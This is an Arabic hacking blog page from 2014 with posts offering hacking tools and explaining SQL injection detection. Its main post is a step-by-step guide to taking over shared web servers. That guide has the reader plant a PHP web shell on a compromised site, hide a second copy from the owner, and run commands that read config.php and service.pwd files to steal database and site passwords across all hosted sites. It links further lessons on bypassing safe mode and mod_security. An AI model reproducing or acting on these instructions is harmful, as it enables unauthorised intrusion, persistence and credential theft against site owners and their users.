جميع ما تحتاجه من برامج الهكر
جميع البرامج تم فحصها من تلغيم وديدان وغيره ... جميع البرامج تم رفعها علي موقع mediafire يفضله الجميع جميع البرامج تم رفعها من رفعي الشخص
امنع الهاكر من التجسس عليك بقفل باب port مفتوح في ...
منع الهاكر من التجسس بقفل احد الابواب المفتوحة في الجهاز كما يقول المثل شد الباب الذي يأتيك منه الريح واستريح
ماذا يجري على الإنترنت كل 60 ثانية ؟
نعلم جميعاً أن مجريات الأمور تتحرك بسرعة على شبكة الإنترنت، في دقيقة واحدة فقط، يُمكن لأحدكم القيام بقراءة وكتابة بعض التغريدات، أو مشاهدة ثلاثة مواقع مفضلة لديه مع الرد على رسالة بريد إلكتروني من رئيسه في العمل، هذا لشخص واحد، فما بالكم بمستخدمي الإنترنت في العالم أجمع؟
ختراق الفيس بوك تويتر وغيرها عن طريق الباك تراك 5
السلام عليكم ورحمة الله وبركاته شرحنا اليوم عباره عن اختراق الفيس بوك تويتر وغيرها عن طريق الباك تراك 5
شرح برنامج يفيد الأشخاص المهتمين باختراق المواقع
برنامج أكثرمن رائع قد يهم أكثر الأشخاص الذين هم مهتمين بعالم اختراق المواقع ، كما قد يهم الأشخاص الذين يبحثون عن معلومات المواقع عبر الأنترنت ، حيث يزودك البرنامج بمجموعة كبيرة من المعلومات حول الموقع بما فيه رقم الهاتف الخاص بجهة الإتصال ، وأيضا يعطيك رقم الأيبي و عنوان الموقع إلى غير ذلك من الأشياء التي تود البحث عنها في أي موقع تريده
مواضيع هامة !!
jeudi 30 janvier 2014
شرح إستغلآل ثغرات ASP
jeudi 16 janvier 2014
تعريف عام للهاكر و انواعه
و مع ظهور الإنترنت و انتشاره دولياً, أنتجت شركة IBM عام 1981م جهاز أسمته ( الكمبيوتر الشخصي) الذي يتميز بصغر حجمه و وزنه الخفيف بالمقارنة مع الكمبيوترات القديمة الضخمة, و أيضا سهولة استخدامه و نقله إلى أي مكان و في أي وقت, و استطاعته الاتصال بالإنترنت في أي وقت. عندها, بدأ الهاكرز عملهم الحقيقي بتعلم كيفية عمل هذه الأجهزة و كيفية برمجة أنظمة التشغيل فيها و كيفية تخريبها, ففي تلك الفترة ظهرت مجموعة منهم قامت بتخريب بعض أجهزة المؤسسات التجارية الموجودة في تلك الفترة. يوماً بعد يوم ظهرت جماعات كبيرة منافسة , تقوم بتخريب أجهزة الشركات و المؤسسات حتى بدأت هذه المجموعات الحرب فيما بينها في التسعينات من هذا القرن و انتهت بإلقاء القبض عليهم .
اولا تعريف عام للهاكر
الهاكر عموما كلمة تصف المختص المتمكن من مهارات في مجال الحاسوب وأمن المعلوماتية. والهاكر (بالإنجليزية: Hacker)
أساسا كلمة أطلقت على مجموعة من المبرمجين الأذكياء الذين كانوا يتحدوا الأنظمة المختلفة ويحاولوا اقتحامها، وليس بالضرورة أن تكون في نيتهم ارتكاب جريمة أو حتى جنحة، ولكن نجاحهم في الاختراق يعتبر نجاحا لقدراتهم ومهارتهم
إلا أن القانون اعتبرهم دخلاء تمكنوا من دخول مكان افتراضي لا يجب أن يكونوا فيه. والقيام بهذا عملية اختيارية يمتحن فيها المبرمج قدراته دون أن يعرف باسمه الحقيقي أو أن يعلن عن نفسه. ولكن بعضهم استغلها بصورة إجرامية تخريبية لمسح المعلومات والبعض الآخر استغلها تجاريا لأغراض التجسس والبعض لسرقة الأموال
* الهاكر ذو القبعة البيضاء (White hat hacker)، ويطلق على الهاكر المصلح.
*الهاكر ذو القبعة السوداء (Black hat hacker)، يطلق على الهاكر المفسد.
* الهاكر ذو القبعة الرمادية (Grey hat hacker)، المترنح بين الإصلاح والعبث.
أما اصطلاح القبعات فأصله مرتبط بتاريخ السينما وخصوصا أفلام رعاة البقر حيث كان الرجل الطيب يرتدي دائما قبعة بيضاء بينما يرتدي الرجل الشرير قبعة سوداء
الهاكر ذو القبعة البيضاء
الهاكر ذو القبعة السوداء
الهاكر ذو القبعة الرمادية
مؤلفوا الفيروسات
يقوم هذا النوع من الهاكر بتصميم الفيروسات محبة في التخريب و تدمير الاجهزه و يعتبر المحللون النفسيون أن من ينتمي إلى هذا النوع من المبرمجين مصاب بمرض عقلي أو نفسي , يدفعه إلى هذه العمليات التخريبية التي لا يجني منها أي فائدة شخصية , ويعتبر هذا النوع من أخطر الانواع
ويوجد انواع اخرى
اشهر الهاكرز و الكراكر : اشهر الهاكر والكراكر التي سجلهم التاريخ :
mardi 14 janvier 2014
ما هي ثغرة sql injection و كيف أتعرف على المواقع المصابة بها
هي تقنيه المستخدمة للاستفادة من الضعف اصدار عن اوامر الكترونيه عبر شبكة لتنفيذ التطبيق من قاعدة البيانات الخلفية ( SQL ) وطبعا المهاجمون يعملون علي الاستفادة الحقيقة من هذا الضعف للوصول الي المعلومات السريه الخاص بالموقع
نبداء شرح استغل SQL-injection عن طريق الخطاء
mysql_fecth_array()
مثل الموقع المستهدف
[****]
كود:
---------------------------------------------
http://www.site.com/index.php?id=1
---------------------------------------------
طبعا لإكتشاف الخطأ سنحاول ندخل رمز غير معروف في القاعده لحدوث الخطاء مثل
كود:
---------------------------------------------
'1
---------------------------------------------
ليكون الموقع بالشكل التالي
الكود :
--------------------------------------------------------
'http://www.site.com/index.php?id=1
--------------------------------------------------------
بعدين عند إدراج الرمز سيعطيك هذه الكتابة
الكود :
------------------------------------------------------------------------------------------------------
Warning: mysql_fecth_array(): supplied argument is not a valid MySQL result resource in
/home/site/index.php on line N
------------------------------------------------------------------------------------------------------
في نظركم ماذا يعني هذا ؟؟؟؟
يعتي أنه الموقع مصاب بثغرة sql injection
طبعا الحمد لله إنتهينا من مرحلة التعرف هل الموقع مصاب بهذه الثغرة
الأن ما هي طرق إستغلال هذه الثغرة ؟؟؟؟؟
هناك طريقتان لإستغلالها
الطريقة الأولى : عن طريق برنامج الشهير havij
الطريقة الثانية : عن طريق الحقن اليدوي
أنا الأن لا أستطيع أن أشرح الطريقتان لأني فعلت هذا الموضوع لكي أشرح ماهي ثغرة sql injection وطريقة تعرف هل الموقع مصاب بها
إنشاء الله في الشرح المقبل سأتطرق لشرح الطريقتان ولاكن فيديو إنشاء الله
و السلام عليكم و رحمة الله تعالى و بكاته
dimanche 12 janvier 2014
طريقة اختراق السيرفرات
نفترض انك اخترقت موقع باي ثغره.. او عندك انت موقع لك عند اي سيرفر..
وتبي تخترق السيرفر.. فهذي بسيطه جدا جدا
قم بتحميل سكربت الشيل بلغة php على جهازك
وهذي وصلة الشيل.. (( متطور )) http://www.alkaen.taqaniat.net/ShellsAlkaeN.zip
------------------------------------------------------------------------------
بسم الله نبدأ في الشرح ::--
البي اتش بي شيل ((phpshell )) هو سكربت بلغة (( php ))
وتستطيع من خلاله تنفيذ اوامر اللينكس.. مثلا احضار باسوردات الـ مواقع التي على السيرفر وايضا قرائة الملف الــ config
للتي على السيرفر..
ولاكن لتنفيذ الاوامر هذه يجب عليك ان تقوم بتحميل الــ phpshell
على موقعك او الموقع الذي اخترقته..
ومن بعد التحميل سوف تستطيع ان تخترق السيرفر كاملا ..
وللتوضيح اكثر..
نفترض انك اخترقت الموقع www.USA.com وقمت بتحميل الــ phpshell
على ملف download
فسيصبح العنوان www.USA.com/download/phpshell.php
وثم اذا دخلنا الى العنوان سوف نجد كلمة اسمها Command وامامها فراغ
في الفراغ هذا سوف نضع فيه اوامر اللينكس..
ولاكن قبل البدء في الشرح الجدي.. احب اوضح نقطه مهمه ::--
يمكن لو شاف صاحب الموقع الشيل.. يروح ويحذفه لك وثم تتورط..
ولاكن لو نسوي اثنين واحد منهم مخفي.. يعني الاول اذا حذفه راح يكون معانا واحد مخفي
لاخفاءه نسوي كذا بالطريقة هذي www.USA.com/download/phpshell.php wget
وثم نقوم باخفائه.. نقوم بتغيير اسمه الى Mv phpshell.php .phpshell.php
ماذا تلاحظ ؟ لقط اضفنا نقطة . واذا حذف الاول راح يكون معانا ثاني ومخفي بعد..
---------------------------------------------
ندخل الى موضوعنا
والان بعد تحميل الشيل على الموقع
يصبح العنوان مثلا www.USA.com/download/phpshell.php
وثم نجد كتابة اسمها Command وامامها فراغ
في الفراغ هذا ندخل اوامر اللينكس عليه..
وندخل الامر هذا مثلا ls /var/named
وهو لاحضار جميع المواقع التي على السيرفر..
ولاكن قبل البدء بالاوامر.. قد تستطيع ان تخترق السيرفر كاملا اذا لم يكن عليه الــ سيف مود
((safe mode))
=============---==-- شرح الاوامر --==--==============
الان سوف اعلمك طريقة سحب : قواعد البيانات - المواقع - الباسوردات
نبدأ من الاسهل حتى الاصعب.. (( كلها سهله لاكن بالباسوردات ))
1- قواعد البيانات
اكتب هذا الامر امام النص Command في الفراغ المقابل له
اكتب هذا الامر
find / -name config.php
الحين راح يطلع لك كل ملفات الكونفيج الي على السيرفر بالشكل هذا :
usr/local/plesk/apache/vhosts/acinovara.com/httpdocs/forum/config.php
usr/local/plesk/apache/vhosts/adamparker.com/httpdocs/blacktalons/admin/config.php
usr/local/plesk/apache/vhosts/ainvar.net/httpdocs/phpBB/config.php
usr/local/plesk/apache/vhosts/aipep.com/httpdocs/bbs/config.php
(( المواقع التي على السيرفر قليله جدا جدا وعدد المواقع يكون على حسب عدد المواقع التي على السيرفر.. وانا عادة يخرج لي 300 موقع ))
ونلاحظ ان التي باللون الزهري هي الموقع..
طيب نبي نقرأ الي متكوب داخل الملف هذا
usr/local/plesk/apache/vhosts/ainvar.net/httpdocs/phpBB/config.php
ونلاحظ ان الموقع هو www.ainvar.net والمنتدى من نوعية phpBB
المهم نبي نقرأ الي بداخله.. نكتب الامر هذا
cat /usr/local/plesk/apache/vhosts/ainvar.net/httpdocs/phpBB/config.php
وثم راح يطلع لك ملف الــ config.php
وبداخله يوجد اليوزر نيم والباسورد لقاعدة البيانات
روح طير للمنتدي وثم لملف الــ admin ودخل اليوزر نيم والباسورد لقاعدة البيانات
او الدخول له عبر برنامج الــ MySQL-Front_2.5_Setup
-------------------------------------------------------
الان انتهينا من قاعدة البيانات باقي باسوردات المواقع..
اكتب امام Command في الفراغ نكتب هذا الامر
find / -name service.pwd
وراح يطلع لنا المواقع بالشكل ذا :
usr/local/plesk/apache/vhosts/acinovara.com/httpdocs/_vti_pvt/service.pwd
usr/local/plesk/apache/vhosts/adamparker.com/httpdocs/_vti_pvt/service.pwd
usr/local/plesk/apache/vhosts/ainvar.net/httpdocs/_vti_pvt/service.pwd
usr/local/plesk/apache/vhosts/aipep.com/httpdocs/_vti_pvt/service.pwd
التي باللون الزهري هي المواقع...
طيب الان ابي استعرض الباسورد للموقع
usr/local/plesk/apache/vhosts/ainvar.net/httpdocs/_vti_pvt/service.pwd
راح نكتب الامر هذا
cat /usr/local/plesk/apache/vhosts/ainvar.net/httpdocs/_vti_pvt/service.pwd
وراح يجينا الباسورد للموقع ومشفر بمقياس DES
----------------------------------------------------------
طيب يوجد طريقة اخرى افضل من ذلك
نكتب الامر هذا
cat /home/*/public_html/_vti_pvt/service.pwd
او
cat /home/*/public_html/_vti_pvt/access.cnf
وراح يجينا الباسوردات لكل المواقع..
ويوجد اوامر اخرى كثيره للينكس.. ابحث عنها في المنتديات الاخرى وسوف تجدها ..
او قول لي وانا اعطيك افضلها واغلبها..
وفي النهاية اتمنى انكم استفدتو من الدرس المبسط عن الاختراق عبر الشيل
وللذين يريدون نقل الموضوع يجب عليهم ذكر المصدر + الحقوق .. وشكرا
samedi 4 janvier 2014
دورة إختراق المواقع والسيرفرات - الجزء الأول
الدرس الأول : تعاريف هامة
http://www.gulfup.com/?b8LxeE
الدرس الثاني : شرح للشل c99
http://www.gulfup.com/?UcposC
الدرس الثالث : الصلاحيات
http://www.gulfup.com/?W3K1l1
الدرس الرابع : التصاريح
http://www.gulfup.com/?dsbmUy
الدرس الخامس : أوامر اللينكس
http://www.gulfup.com/?VHHkHm
الدرس السادس : تخطي صلاحيات اليوزر 1
http://www.gulfup.com/?ZnC558
الدرس السابع : تخطي صلاحيات اليوزر 2
http://www.gulfup.com/?BxNQHz
الدرس الثامن : تخطي صلاحيات اليوزر 3
http://www.gulfup.com/?6wo6R1
الدرس التاسع : تخطي صلاحيات اليوزر 4
http://www.gulfup.com/?hnaY8X
الدرس العاشر : تخطي السيف مود 1
http://www.gulfup.com/?8n5JoA
الدرس الحادي عشر : تخطي المود سكيورتي
http://www.gulfup.com/?RkZQbP
الدرس الثاني عشر : تخطى السيف مود 2
http://www.gulfup.com/?Y0Ju6P
الدرس الثالث عشر : تخطى السيف مود 3
http://www.gulfup.com/?nruMtZ
الدرس الرابع عشر : تخطى السيف مود 4
http://www.gulfup.com/?kQWDSj
الدرس الخامس عشر : تخطي مشاكل التنقل فى حالة صلاحية نوبادي (nobody)
http://www.gulfup.com/?Xp65js
الدرس السادس عشر : تخطي مشكلة Forbidden
http://www.gulfup.com/?YwnHs5
الدرس السابع عشر : تخطي مشلكة Internal Server Error
http://www.gulfup.com/?Cdn2nS
الدرس الثامن عشر : تخطي مشكلة Service Temporarily Unavailable
http://www.gulfup.com/?fZpDWD
الدرس التاسع عشر : تخطي مشكلة Not Acceptable
http://www.gulfup.com/?OnjI2W
بدون باس
HerCuLano